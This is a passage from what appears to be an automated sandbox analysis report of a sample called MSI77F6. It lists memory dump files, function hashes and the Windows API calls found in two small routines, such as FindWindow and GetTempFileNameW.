                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 5102ae46961843061244d22d00d6149bd5464e91de9d021fe509edfad6a36394
                                        • Instruction ID: 686b5758c476f734dbfc146f9496633ce22ad1556a2e4a3cf442aefbbc53f27e
                                        • Opcode Fuzzy Hash: 5102ae46961843061244d22d00d6149bd5464e91de9d021fe509edfad6a36394
                                        • Instruction Fuzzy Hash: 64D0A932384310B7E770A330AC0FFEA6A48EB24B01F0009287209AA2C0C8A8B800C624
                                        Function 007BD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 007BD01E
                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 007BD035
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: ad0dae44d08f0070bb50647d141b817c3a53187473fb8074c566d56336701b69
                                        • Instruction ID: 189ff7fdd8a9d2b1dbc2db9095cc4a2afdd16cdbd5469e94d7be41236625bd43
                                        • Opcode Fuzzy Hash: ad0dae44d08f0070bb50647d141b817c3a53187473fb8074c566d56336701b69
                                        • Instruction Fuzzy Hash: E0D05EB154030EBBDB20ABA0ED0EFA97B6CB700704F1081907614D10D1D2F8DA85DBA4